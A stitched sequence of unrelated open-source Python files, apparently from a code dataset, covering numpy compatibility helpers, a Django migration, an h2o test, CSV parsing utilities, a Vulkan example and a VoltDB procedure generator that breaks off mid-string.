    return exc_value
def asbytes_nested(x):
    """Recursively apply asbytes to nested iterables of strings."""
    # Strings are themselves iterable, so exclude them from recursion.
    if hasattr(x, '__iter__') and not isinstance(x, (bytes, unicode)):
        return [asbytes_nested(element) for element in x]
    return asbytes(x)
def asunicode_nested(x):
    """Recursively apply asunicode to nested iterables of strings."""
    # Strings are themselves iterable, so exclude them from recursion.
    if hasattr(x, '__iter__') and not isinstance(x, (bytes, unicode)):
        return [asunicode_nested(element) for element in x]
    return asunicode(x)
|
pprett/statsmodels
|
statsmodels/compatnp/py3k.py
|
Python
|
bsd-3-clause
| 1,592
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Auto-generated initial migration: creates the Item table with only the
    # implicit auto-increment primary key column. Do not edit by hand.
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Item',
            fields=[
                ('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
            ],
        ),
    ]
|
williamHuang5468/LearningDjango
|
todoLists/lists/migrations/0001_initial.py
|
Python
|
mit
| 420
|
import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_kmeans, h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
# assume we're at 0xdata with it's hdfs namenode
h2o.init(1)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_KMeans_allstate_s3n_thru_hdfs(self):
bucket = 'home-0xdiag-datasets'
csvFilename = "CAT*"
importFolderPath = "cats"
csvPathname = importFolderPath + "/" + csvFilename
timeoutSecs = 600
trialMax = 1
for trial in range(trialMax):
trialStart = time.time()
hex_key = csvFilename + "_" + str(trial) + ".hex"
start = time.time()
parseResult = h2i.import_parse(bucket=bucket, path=csvPathname, schema='s3n', hex_key=hex_key,
timeoutSecs=timeoutSecs, retryDelaySecs=10, pollTimeoutSecs=60))
elapsed = time.time() - start
print "parse end on ", hex_key, 'took', elapsed, 'seconds',\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
print "parse result:", parseResult['destination_key']
kwargs = {
'cols': None,
'initialization': 'Furthest',
'k': 12
}
start = time.time()
kmeans = h2o_cmd.runKMeans(parseResult=parseResult, \
timeoutSecs=timeoutSecs, retryDelaySecs=2, pollTimeoutSecs=120, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvFilename, 'took', elapsed, 'seconds.', \
"%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
h2o_kmeans.simpleCheckKMeans(self, kmeans, **kwargs)
### print h2o.dump_json(kmeans)
inspect = h2o_cmd.runInspect(None,key=kmeans['destination_key'])
print h2o.dump_json(inspect)
print "Trial #", trial, "completed in", time.time() - trialStart, "seconds.", \
if __name__ == '__main__':
    # Run through h2o's unittest wrapper when executed directly.
    h2o.unit_main()
|
vbelakov/h2o
|
py/testdir_ec2_only/test_KMeans_cats_s3n_thru_hdfs.py
|
Python
|
apache-2.0
| 2,199
|
import time
import webbrowser
def fresh():
i=0
utube=r"https://www.youtube.com/watch?v=J3BpOKzEdMI"
while i<2:
print 'time:%s' %time.ctime()
webbrowser.open(utube)
time.sleep(2)
i+=1
fresh()
|
lakshita-bhatia/python-scripts
|
say_hello.py
|
Python
|
mit
| 206
|
import functools
import sys
import types
from nose import SkipTest
from nose.tools import eq_
from .. import helper
from ..helper import MockXPI
from appvalidator.constants import SPIDERMONKEY_INSTALLATION
from appvalidator.errorbundle import ErrorBundle
from appvalidator.errorbundle.outputhandlers.shellcolors import OutputHandler
import appvalidator
import appvalidator.testcases.content
appvalidator.testcases.javascript.traverser.JS_DEBUG = True
appvalidator.testcases.javascript.predefinedentities.enable_debug()
def uses_js(func):
    """Tag *func* as a JS-dependent test; tolerates None and bound methods."""
    if not func:
        return func
    try:
        func.js = True
    except Exception:
        # If Python >2.7 squaks about methods being bound, just work around
        # the nonsense by tagging the underlying function object.
        func.__func__.js = True
    return func
def skip_on_acorn(func):
    """Skips a test when the test is run under Acorn."""
    # Without a SpiderMonkey installation the suite runs under Acorn, where
    # these tests are not applicable.
    if SPIDERMONKEY_INSTALLATION:
        return func
    raise SkipTest()
class TestCase(helper.TestCase):
"""A TestCase object with specialized functions for JS testing."""
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
for method in filter(callable, (getattr(self, m) for m in dir(self))):
if not method.__name__.startswith("test_"):
continue
uses_js(method)
uses_js(None)
def setUp(self):
self.file_path = "foo.js"
self.final_context = None
super(TestCase, self).setUp()
def run_script_from_file(self, path):
"""
Run the standard set of JS engine tests on a script found at the
location in `path`.
"""
with open(path) as script_file:
return self.run_script(script_file.read())
def run_script(self, script):
"""
Run the standard set of JS engine tests on the script passed via
`script`.
"""
print "Running", script
if self.err is None:
self.setup_err()
appvalidator.testcases.content._process_file(self.err, MockXPI(),
self.file_path, script)
if self.err.final_context is not None:
print self.err.final_context.output()
self.final_context = self.err.final_context
def get_var(self, name):
"""
Return the value of a variable from the final script context.
"""
try:
return self.final_context.data[name].get_literal_value()
except KeyError:
raise ("Test seeking variable (%s) not found in final context." %
name)
def assert_var_eq(self, name, value, explanation=None):
"""
Assert that the value of a variable from the final script context
contains the value specified.
"""
print "Testing {var} == {val}".format(var=name, val=value)
val = self.get_var(name)
if isinstance(val, float):
val *= 100000
val = round(val)
val /= 100000
eq_(val, value,
explanation or "%r doesn't equal %r" % (val, value))
def must_assert(func):
    """Decorator asserting that the wrapped test used a JS assert method."""
    @functools.wraps(func)
    def checked(self):
        func(self)
        # The test body must have flipped err.asserts via a JS assertion.
        assert getattr(self.err, "asserts", False), "Does not assert!"
    return checked
def silent(func):
    """Decorator asserting that the output of the wrapped test is silent."""
    @functools.wraps(func)
    def checked(self):
        func(self)
        self.assert_silent()
    return checked
def warnings(count=None):
    """Decorator asserting that the wrapped test produced warnings."""
    def decorator(func):
        @functools.wraps(func)
        def checked(self):
            func(self)
            self.assert_failed(with_warnings=True)
            if count is None:
                return
            # Pin the exact number of warnings when requested.
            eq_(len(self.err.warnings), count,
                "Warning count does not match")
        return checked
    return decorator
def errors(count=None):
    """Decorator asserting that the wrapped test produced errors."""
    def decorator(func):
        @functools.wraps(func)
        def wrap(self):
            func(self)
            self.assert_failed(with_errors=True)
            if count is not None:
                # BUG FIX: the message previously said "Warning count"
                # (copy-paste from the warnings() decorator above).
                eq_(len(self.err.errors), count,
                    "Error count does not match")
        return wrap
    return decorator
|
diox/app-validator
|
tests/js/js_helper.py
|
Python
|
bsd-3-clause
| 4,452
|
#!/usr/bin/python
import math
# Brute-force check, near the 16-bit boundary, that the division-based
# predicate 'i > limit / j' agrees with exact 32-bit product overflow
# (i*j >= 2**32). Python 2 integer division floors, matching C semantics.
limit = (1 << 32) - 1
for i in xrange(65536 + 10):
    if i == 0:
        continue
    # Candidate j values straddling the exact overflow threshold 2**32 / i.
    temp = float(1 << 32) / float(i)
    approx1 = int(math.floor(temp) - 3)
    approx2 = int(math.floor(temp + 3))
    for j in xrange(approx1, approx2 + 1):
        if i*j >= (1 << 32):
            exact = True
        else:
            exact = False
        if i > limit / j:
            check = True
        else:
            check = False
        #print(i, j, exact, check)
        # Report any j where the cheap check disagrees with exact overflow.
        if exact != check:
            print('inexact', i, j)
|
daimajia/duktape
|
misc/c_overflow_test.py
|
Python
|
mit
| 458
|
from ctypes import byref, c_uint32
import vk
import ctypes
import time
# Describe the Vulkan instance: application/engine identification plus the
# surface extensions needed for on-screen rendering (xcb here).
ci = vk.InstanceCreateInfo(dict(
    applicationInfo = dict(
        applicationName = "vkstruct test",
        applicationVersion = 1,
        engineName = "hello engine",
        engineVersion = 1,
        # presumably the VK_MAKE_VERSION(1, 0, 0) bit packing -- confirm
        apiVersion = (1 << 22 | 0 << 12 | 0)
    ),
    #enabledLayerNames = ["VK_LAYER_LUNARG_api_dump"],
    enabledExtensionNames = ["VK_KHR_surface", "VK_KHR_xcb_surface"],
))
instance = vk.Instance()
vk.createInstance(ci, None, instance)
# Standard two-call enumeration: first query the count, then fill the array.
count = c_uint32()
vk.enumeratePhysicalDevices(instance, byref(count), None)
physicaldevices = vk.PhysicalDevice.array(count.value)
vk.enumeratePhysicalDevices(instance, byref(count), physicaldevices)
# Pick the first physical device that offers a graphics-capable queue family.
for dev in physicaldevices:
    prop = vk.PhysicalDeviceProperties.blank()
    vk.getPhysicalDeviceProperties(dev, byref(prop))
    print "apiversion", prop.apiVersion
    print "driversion", prop.driverVersion
    print "vendorid", prop.vendorID
    print "deviceid", prop.deviceID
    print "devicetype", prop.deviceType
    print "devicename", prop.deviceName
    # Two-call enumeration again, this time for the queue families.
    vk.getPhysicalDeviceQueueFamilyProperties(dev, byref(count), None)
    queuefamilies = vk.QueueFamilyProperties.array(count.value)
    vk.getPhysicalDeviceQueueFamilyProperties(dev, byref(count), queuefamilies)
    graphicQueueIndex = -1
    for index, family in enumerate(queuefamilies):
        qf = vk.QueueFlags(family.queueFlags)
        print qf
        if "GRAPHICS_BIT" in qf:
            graphicQueueIndex = index
        #print family.queueCount
        #print family.timestampValidBits
        #print family.minImageTransferGranularity
        #print family.minImageTransferGranularity.width
        #print family.minImageTransferGranularity.height
        #print family.minImageTransferGranularity.depth
    if graphicQueueIndex < 0:
        raise Exception("No fitting queue")
    # Use the first qualifying device.
    break
else:
    # The loop never hit 'break': no physical device qualified.
    raise Exception("No devices found")
gpu = dev
# Create a logical device exposing one queue (priority 1.0) from the graphics
# family found above, with the api_dump layer and swapchain extension enabled.
ci = vk.DeviceCreateInfo(dict(
    queueCreateInfos = [dict(
        queueFamilyIndex = graphicQueueIndex,
        queuePriorities = [1.0]
    )],
    enabledLayerNames = ["VK_LAYER_LUNARG_api_dump"],
    enabledExtensionNames = ["VK_KHR_swapchain"]
))
dev = vk.Device()
vk.createDevice(gpu, ci, None, dev)
vk.deviceWaitIdle(dev)
# Fetch the queue handle and make sure it is usable.
queue = vk.Queue()
vk.getDeviceQueue(dev, graphicQueueIndex, 0, queue)
vk.queueWaitIdle(queue)
print "success"
# Now, we do not have anything to draw to, but it's nice to check
# whether the things work or not. Lets create a little part of a structure for creating
# a pipeline, so you can see it works. The construction is timed below.
begin = time.time()
pipeline = vk.GraphicsPipelineCreateInfo(dict(
    vertexInputState = dict(
        vertexBindingDescriptions = [
            dict(binding = 0, stride = 24, inputRate = "VERTEX"),
        ],
        vertexAttributeDescriptions = [
            dict(binding = 0, location = 0, format = "R32G32B32_SFLOAT", offset = 0),
            dict(binding = 0, location = 1, format = "R32G32B32_SFLOAT", offset = 12),
        ]
    ),
    inputAssemblyState = dict(topology = "TRIANGLE_LIST"),
    viewportState = dict(
        viewports = [
            dict(x=0, y=0, width=200, height=200, minDepth=0.0, maxDepth=1.0)
        ],
        scissors = [
            dict(offset=dict(x=0, y=0), extent=dict(width=200, height=200))
        ]
    )
))
end = time.time()
delta = end - begin
print "took", delta, "seconds"
# True pipeline would be longer than this, but like you can see, it's rather neat.
# Note that it takes ~2ms to fill the structure here, but the pipelines aren't constructed
# in middle of rendering.
# Tear everything down in reverse creation order.
vk.destroyDevice(dev, None)
vk.destroyInstance(instance, None)
|
cheery/vkstruct
|
example.py
|
Python
|
mit
| 3,670
|
import os, types, collections
class EmptyLine(Exception):
    """Raised when an empty or comment line is found (dealt with internally)"""

    def __init__(self, lineNumber):
        # Keep the formatted text on the instance so __str__ can return it.
        text = "Empty line: #%d" % lineNumber
        Exception.__init__(self, text)
        self.message = text

    def __str__(self):
        return self.message
def removeDuplicates(inFileName, outFileName) :
    """Removes duplicated lines from the 'inFileName' CSV file; the results are written to 'outFileName'.

    The first line is treated as the legend and always kept; any later line
    equal to an already-seen line (or to the legend) is dropped. Order of
    first occurrences is preserved.
    """
    # Context managers close the files even on error (the original leaked
    # handles and pointlessly flushed a read-only handle); a set gives O(1)
    # membership tests and ''.join avoids quadratic concatenation.
    with open(inFileName) as inFile :
        legend = inFile.readline()
        seen = set([legend])
        kept = []
        for line in inFile :
            if line not in seen :
                seen.add(line)
                kept.append(line)
    with open(outFileName, 'w') as outFile :
        outFile.write(legend + ''.join(kept))
def catCSVs(folder, ouputFileName, removeDups = False) :
    """Concatenates all csv in 'folder' and writes the results in 'ouputFileName'. May not work on non Unix systems"""
    # NOTE(review): 'folder' and 'ouputFileName' are interpolated into a shell
    # command unescaped -- do not call this with untrusted input.
    strCmd = r"""cat %s/*.csv > %s""" %(folder, ouputFileName)
    os.system(strCmd)
    if removeDups :
        removeDuplicates(ouputFileName, ouputFileName)
def joinCSVs(csvFilePaths, column, ouputFileName, separator = ',') :
    """csvFilePaths should be an iterable. Joins all CSVs according to the values in the column 'column'. Write the results in a new file 'ouputFileName' """
    res = ''
    legend = []
    csvs = []
    # Parse every input file and accumulate their legends side by side.
    for f in csvFilePaths :
        c = CSVFile()
        c.parse(f)
        csvs.append(c)
        legend.append(separator.join(list(c.legend.keys())))
    legend = separator.join(legend)
    lines = []
    # For each row of the first CSV, append the matching rows (same value in
    # 'column') from every other CSV. Nested scan: O(rows^2) per file pair.
    for i in range(len(csvs[0])) :
        val = csvs[0].get(i, column)
        # NOTE(review): joining a CSVEntry iterates (field, value) pairs --
        # verify this produces the intended row text.
        line = separator.join(csvs[0][i])
        for c in csvs[1:] :
            for j in range(len(c)) :
                if val == c.get(j, column) :
                    line += separator + separator.join(c[j])
        lines.append( line )
    res = legend + '\n' + '\n'.join(lines)
    f = open(ouputFileName, 'w')
    f.write(res)
    f.flush()
    f.close()
    return res
class CSVEntry(object) :
    """A single entry (row) in a CSV file"""
    def __init__(self, csvFile, lineNumber = None) :
        # csvFile: owning CSVFile; lineNumber: index of the raw text line to
        # parse, or None to create an empty row sized to the legend.
        self.csvFile = csvFile
        self.data = []
        if lineNumber != None :
            self.lineNumber = lineNumber
            tmpL = csvFile.lines[lineNumber].replace('\r', '\n').replace('\n', '')
            # Empty and comment lines are signalled to the caller, which
            # removes them from the file's line list.
            if len(tmpL) == 0 or tmpL[0] in ["#", "\r", "\n", csvFile.lineSeparator] :
                raise EmptyLine(lineNumber)
            tmpData = tmpL.split(csvFile.separator)
            # tmpDatum = []
            i = 0
            while i < len(tmpData) :
            # for d in tmpData :
                d = tmpData[i]
                sd = d.strip()
                if len(sd) > 0 and sd[0] == csvFile.stringSeparator :
                    # Quoted field: re-join the separator-split pieces up to
                    # the closing quote, then strip the surrounding quotes.
                    # NOTE(review): the inner for rebinds i, which also
                    # advances the outer while -- behaviour relied upon here.
                    more = []
                    for i in range(i, len(tmpData)) :
                        more.append(tmpData[i])
                        i+=1
                        if more[-1][-1] == csvFile.stringSeparator :
                            break
                    self.data.append(",".join(more)[1:-1])
                    # if len(tmpDatum) > 0 or (len(sd) > 0 and sd[0] == csvFile.stringSeparator) :
                    #     tmpDatum.append(sd)
                    #     if len(sd) > 0 and sd[-1] == csvFile.stringSeparator :
                    #         self.data.append(csvFile.separator.join(tmpDatum))
                    #         tmpDatum = []
                else :
                    self.data.append(sd)
                    i += 1
        else :
            # No source line: create a blank row with one cell per column.
            self.lineNumber = len(csvFile)
            for i in range(len(self.csvFile.legend)) :
                self.data.append('')
    def commit(self) :
        """commits the line so it is added to a file stream"""
        self.csvFile.commitLine(self)
    def __iter__(self) :
        self.currentField = -1
        return self
    def __next__(self) :
        # Iterating a row yields (field name, value) pairs.
        self.currentField += 1
        if self.currentField >= len(self.csvFile.legend) :
            raise StopIteration
        k = list(self.csvFile.legend.keys())[self.currentField]
        v = self.data[self.currentField]
        return k, v
    def __getitem__(self, key) :
        """Returns the value of field 'key'"""
        try :
            indice = self.csvFile.legend[key.lower()]
        except KeyError :
            raise KeyError("CSV File has no column: '%s'" % key)
        return self.data[indice]
    def __setitem__(self, key, value) :
        """Sets the value of field 'key' to 'value' """
        try :
            field = self.csvFile.legend[key.lower()]
        except KeyError :
            # Unknown column: extend the file's legend and this row.
            self.csvFile.addField(key)
            field = self.csvFile.legend[key.lower()]
            self.data.append(str(value))
        else :
            try:
                self.data[field] = str(value)
            except Exception as e:
                # Row shorter than the legend: pad with empty cells first.
                for i in range(field-len(self.data)+1) :
                    self.data.append("")
                self.data[field] = str(value)
    def toStr(self) :
        # Raw CSV text for this row (no trailing line separator).
        return self.csvFile.separator.join(self.data)
    def __repr__(self) :
        r = {}
        for k, v in self.csvFile.legend.items() :
            r[k] = self.data[v]
        return "<line %d: %s>" %(self.lineNumber, str(r))
    def __str__(self) :
        return repr(self)
class CSVFile(object) :
    """
    Represents a whole CSV file::
        #reading
        f = CSVFile()
        f.parse('hop.csv')
        for line in f :
            print(line['ref'])
        #writing, legend can either be a list of a dict {field : column number}
        f = CSVFile(legend = ['name', 'email'])
        l = f.newLine()
        l['name'] = 'toto'
        l['email'] = "hop@gmail.com"
        for field, value in l :
            print(field, value)
        f.save('myCSV.csv')
    """
    def __init__(self, legend = (), separator = ',', lineSeparator = '\n') :
        # BUG FIX: the default used to be a mutable list; an empty tuple is
        # safe and behaves identically for the read-only uses below.
        self.legend = collections.OrderedDict()
        for i in range(len(legend)) :
            if legend[i].lower() in self.legend :
                raise ValueError("%s is already in the legend" % legend[i].lower())
            self.legend[legend[i].lower()] = i
        self.strLegend = separator.join(legend)
        self.filename = ""
        self.lines = []
        self.separator = separator
        self.lineSeparator = lineSeparator
        self.currentPos = -1
        # Streaming state, see streamToFile().
        self.streamFile = None
        self.writeRate = None
        self.streamBuffer = None
        self.keepInMemory = True

    def addField(self, field) :
        """add a field to the legend"""
        if field.lower() in self.legend :
            raise ValueError("%s is already in the legend" % field.lower())
        self.legend[field.lower()] = len(self.legend)
        if len(self.strLegend) > 0 :
            self.strLegend += self.separator + field
        else :
            self.strLegend += field

    def parse(self, filePath, skipLines=0, separator = ',', stringSeparator = '"', lineSeparator = '\n') :
        """Loads a CSV file"""
        self.filename = filePath
        f = open(filePath)
        if lineSeparator == '\n' :
            lines = f.readlines()
        else :
            lines = f.read().split(lineSeparator)
        f.close()
        lines = lines[skipLines:]
        self.lines = []
        self.comments = []
        for l in lines :
            # BUG FIX: the original 'elif l[0] == "#"' raised IndexError on
            # empty lines (possible when splitting on a custom lineSeparator).
            if len(l) == 0 :
                continue
            if l[0] == "#" :
                self.comments.append(l)
            else :
                self.lines.append(l)
        self.separator = separator
        self.lineSeparator = lineSeparator
        self.stringSeparator = stringSeparator
        # The first remaining line is the legend; deduplicate its columns.
        self.legend = collections.OrderedDict()
        i = 0
        for c in self.lines[0].lower().replace(stringSeparator, '').split(separator) :
            legendElement = c.strip()
            if legendElement not in self.legend :
                self.legend[legendElement] = i
            i+=1
        self.strLegend = self.lines[0].replace('\r', '\n').replace('\n', '')
        self.lines = self.lines[1:]

    def streamToFile(self, filename, keepInMemory = False, writeRate = 1) :
        """Starts a stream to a file. Every line must be committed (l.commit()) to be appended in to the file.
        If keepInMemory is set to True, the parser will keep a version of the whole CSV in memory, writeRate is the number
        of lines that must be committed before an automatic save is triggered.
        """
        if len(self.legend) < 1 :
            raise ValueError("There's no legend defined")
        # Narrowed from a bare except: only a missing file is expected here.
        try :
            os.remove(filename)
        except OSError :
            pass
        self.streamFile = open(filename, "a")
        self.writeRate = writeRate
        self.streamBuffer = []
        self.keepInMemory = keepInMemory
        self.streamFile.write(self.strLegend + "\n")

    def commitLine(self, line) :
        """Commits a line making it ready to be streamed to a file and saves the current buffer if needed. If no stream is active, raises a ValueError"""
        if self.streamBuffer is None :
            raise ValueError("Commit lines is only for when you are streaming to a file")
        self.streamBuffer.append(line)
        # Flush the buffer every writeRate committed lines.
        if len(self.streamBuffer) % self.writeRate == 0 :
            for i in range(len(self.streamBuffer)) :
                self.streamBuffer[i] = str(self.streamBuffer[i])
            self.streamFile.write("%s\n" % ('\n'.join(self.streamBuffer)))
            self.streamFile.flush()
            self.streamBuffer = []

    def closeStreamToFile(self) :
        """Appends the remaining commited lines and closes the stream. If no stream is active, raises a ValueError"""
        if self.streamBuffer is None :
            raise ValueError("Commit lines is only for when you are streaming to a file")
        for i in range(len(self.streamBuffer)) :
            self.streamBuffer[i] = str(self.streamBuffer[i])
        self.streamFile.write('\n'.join(self.streamBuffer))
        self.streamFile.close()
        # Reset the streaming state.
        self.streamFile = None
        self.writeRate = None
        self.streamBuffer = None
        self.keepInMemory = True

    def _developLine(self, line) :
        """Lazily replace the raw text at index 'line' with a parsed CSVEntry,
        deleting empty/comment lines encountered at that index."""
        stop = False
        while not stop :
            try :
                if self.lines[line].__class__ is not CSVEntry :
                    devL = CSVEntry(self, line)
                    stop = True
                else :
                    devL = self.lines[line]
                    stop = True
            except EmptyLine as e :
                del(self.lines[line])
        self.lines[line] = devL

    def get(self, line, key) :
        """Return the value of column 'key' at row 'line'."""
        self._developLine(line)
        return self.lines[line][key]

    def set(self, line, key, val) :
        """Set the value of column 'key' at row 'line'."""
        self._developLine(line)
        self.lines[line][key] = val

    def newLine(self) :
        """Appends an empty line at the end of the CSV and returns it"""
        l = CSVEntry(self)
        if self.keepInMemory :
            self.lines.append(l)
        return l

    def insertLine(self, i) :
        """Inserts an empty line at position i and returns it"""
        # BUG FIX: this used self.data, an attribute that does not exist on
        # CSVFile; the rows live in self.lines.
        self.lines.insert(i, CSVEntry(self))
        return self.lines[i]

    def save(self, filePath) :
        """save the CSV to a file"""
        self.filename = filePath
        f = open(filePath, 'w')
        f.write(self.toStr())
        f.flush()
        f.close()

    def toStr(self) :
        """returns a string version of the CSV"""
        s = [self.strLegend]
        for l in self.lines :
            s.append(l.toStr())
        return self.lineSeparator.join(s)

    def __iter__(self) :
        self.currentPos = -1
        return self

    def __next__(self) :
        self.currentPos += 1
        if self.currentPos >= len(self) :
            raise StopIteration
        self._developLine(self.currentPos)
        return self.lines[self.currentPos]

    def __getitem__(self, line) :
        """Row access; develops raw lines on demand."""
        try :
            if self.lines[line].__class__ is not CSVEntry :
                self._developLine(line)
        except AttributeError :
            # NOTE(review): slice support relies on CSVEntry raising
            # AttributeError when handed a slice; the slice's stop bound is
            # effectively ignored here -- verify against callers.
            start = line.start
            if start is None :
                start = 0
            for l in range(len(self.lines[line])) :
                self._developLine(l + start)
        return self.lines[line]

    def __len__(self) :
        return len(self.lines)
|
tariqdaouda/pyGeno
|
pyGeno/tools/parsers/CSVTools.py
|
Python
|
apache-2.0
| 10,715
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Contains expectations."""
import inquisition
# Start from the canned SPANISH inquisition text...
FISHY = inquisition.SPANISH
# ...then swap 'surprise' for 'haddock' before printing the result.
FISHY = FISHY.replace('surprise', 'haddock')
print FISHY
|
aedoler/is210-week-03-synthesizing
|
task_01.py
|
Python
|
mpl-2.0
| 183
|
from ANN_simulation import *
import argparse
# Command-line driver for the ANN-accelerated sampling simulation.
parser = argparse.ArgumentParser()
parser.add_argument("--starting_index", type=int, default=1, help="index of starting iteration")
parser.add_argument("--num_of_iterations", type=int, default=10, help="number of iterations to run")
parser.add_argument("--starting_network_file", type=str, default=None, help="the network to start with")
parser.add_argument("--training_interval", type=int, default=1, help="training interval")
args = parser.parse_args()
# Resume from a pickled autoencoder when one is given; otherwise start fresh.
if args.starting_network_file is None:
    starting_network = None
else:
    starting_network = autoencoder.load_from_pkl_file(args.starting_network_file)
init_iter = iteration(index = args.starting_index, network = starting_network)
a = simulation_with_ANN_main(num_of_iterations = args.num_of_iterations, initial_iteration = init_iter, training_interval=args.training_interval)
a.run_mult_iterations()
print("Done main work!")
|
weiHelloWorld/accelerated_sampling_with_autoencoder
|
MD_simulation_on_alanine_dipeptide/current_work/src/main_work.py
|
Python
|
mit
| 934
|
#!/usr/bin/env python
# This file is part of VoltDB.
# Copyright (C) 2008-2014 VoltDB Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
import sys
import os
# this is deprecated sinve version 2.7
from optparse import OptionParser
import re
import subprocess
import filecmp
# Skeleton for a generated single-statement VoltDB stored procedure; the
# {%...} markers are filled in by generate_one_function().
java_template = '''
package {%package};
import org.voltdb.*;
public class {%classname} extends VoltProcedure {
public final SQLStmt stmt = new SQLStmt("{%statement}");
public VoltTable[] run({%type_param}) {
voltQueueSQL(stmt{%parameters});
return voltExecuteSQL();
}
}
'''
#TODO: is it better to use a dictionary instead of a list?
#TODO: exception handler
# Maps VoltDB type ids (the list index) to the java parameter type used in the
# generated run() signature; 'not used' entries are ids with no java mapping.
volt_type = ['', # id = 0, INVALID
'', # id = 1, NULL
'', # id = 2, NUMERIC
'byte', # id = 3, TINYINT
'short', # id = 4, SMALLINT
'int', # id = 5, INTEGER
'long', # id = 6, BIGINT
'not used',
'double', # id = 8, FLOAT
'String', # id = 9, STRING
'not used',
'org.voltdb.types.TimestampType', # id = 11, TIMESTAMP
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'not used',
'VoltTable', # id = 21, VOLTTABLE
'java.math.BigDecimal', # id = 22, DECIMAL
'not used',
'not used',
'byte[]', # id = 25, VARBINARY
]
def generate_one_function(func_name, package, statement, param_types, is_array, output_file):
    """Render java_template into a VoltDB stored-procedure .java file.

    func_name   -- class name of the generated procedure
    package     -- java package the class is placed in
    statement   -- SQL text embedded in the SQLStmt
    param_types -- java type name for each run() parameter
    is_array    -- parallel flags; True appends [] to the matching type
    output_file -- path the rendered source is written to
    """
    rv = java_template.replace('{%package}', package)
    rv = rv.replace('{%classname}', func_name)
    rv = rv.replace('{%statement}', statement)
    type_param_list = []
    param_list = []
    for i, (pt, ia) in enumerate(zip(param_types, is_array)):
        if ia:
            pt += "[] "
        else:
            pt += " "
        v = "param" + str(i)
        type_param_list.append(pt + v)
        param_list.append(v)
    rv = rv.replace('{%type_param}', ", ".join(type_param_list))
    if param_types:
        # Leading ", " chains the parameters onto voltQueueSQL(stmt, ...).
        tmp = ", " + ", ".join(param_list)
    else:
        tmp = ""
    rv = rv.replace('{%parameters}', tmp)
    # BUG FIX: use a context manager so the file handle is closed even if
    # write() fails (the original leaked the handle on error).
    with open(output_file, "w") as f:
        f.write(rv)
def extract_a_procedure(f):
    """Parse one procedure entry from the catalog stream 'f'.

    Returns (func_name, statement, param_types, is_array, current_line);
    the caller is positioned on the line the parser stopped at.
    """
    line = f.next()
    func_name = line.strip().split()[-1].strip("\"")
    line = f.next() #readonly
    line = f.next()
    # TODO: use it somewhere?
    single_part = True if line.strip().split()[-1] == "true" else False
    while line.startswith('set'):
        line = f.next()
    # sql statement: strip quotes, re-escape embedded quotes, collapse spaces
    line = f.next()
    statement = line.split("sqltext")[-1].strip()
    statement = statement.strip("\"")
    statement = statement.replace("\"", "\\\"")
    statement = ' '.join(statement.split())
    while line.startswith('set'):
        line = f.next()
    # get the type of each parameter (id -> java type via volt_type)
    param_types = []
    is_array = []
    while line.startswith('add /clusters[cluster]/databases[database]/procedures[' + func_name + ']/statements[sql] parameters'):
        f.next()
        line = f.next()
        param_types.append(volt_type[int(line.strip().split()[-1])])
        line = f.next().strip().split()[-1] # isarray
        is_array.append(True if line == "true" else False)
        f.next()
        f.next()
        line = f.next()
    # java doesn't permit '.' in a class/file name; replace with '_'
    func_name = func_name.replace('.', '_')
    # because it is hard to go back to the previous line, we need to store the current line
    return func_name, statement, param_types, is_array, line
def find_a_procedure(f, func_name = "", cur_line = ""):
    """Scan forward for the next (or the named) procedure and extract it."""
    prefix = "add /clusters[cluster]/databases[database] procedures " + func_name
    # The caller may hand back the line the previous parse stopped on.
    if cur_line.startswith(prefix):
        return extract_a_procedure(f)
    for candidate in f:
        if candidate.startswith(prefix):
            return extract_a_procedure(f)
    # Nothing (more) to extract.
    return None, None, None, None, None
def process_spec_func(func_name, package, input_file, output_dir):
    """Generate the .java stub for the single procedure named func_name."""
    f = open(input_file)
    name, statement, param_types, is_array, line = find_a_procedure(f, func_name, "")
    f.close()
    if name:
        generate_one_function(name, package, statement, param_types, is_array, output_dir + '/' + name + '.java')
    else:
        print "ERROR: couldn't find " + func_name
def process_whole_ddl(package, input_file, output_dir):
    """Generate a .java stub for every procedure found in input_file."""
    catalog = open(input_file)
    last_line = ""
    while True:
        name, statement, param_types, is_array, last_line = \
            find_a_procedure(catalog, cur_line = last_line)
        if not name:
            # No further procedures in the catalog.
            break
        generate_one_function(name, package, statement, param_types, is_array,
                              output_dir + '/' + name + '.java')
    catalog.close()
def self_test():
    """End-to-end smoke test: compile a tiny DDL with voltdb, extract its
    procedure, generate the java stub and diff it against a golden copy.
    Exits the process with 0 on success, -1 on mismatch."""
    ddl = '''
CREATE TABLE P1 (
ID INTEGER DEFAULT '0' NOT NULL,
BIG BIGINT,
RATIO FLOAT,
TM TIMESTAMP DEFAULT '2014-12-31',
VAR VARCHAR(300),
DEC DECIMAL,
PRIMARY KEY (ID)
);
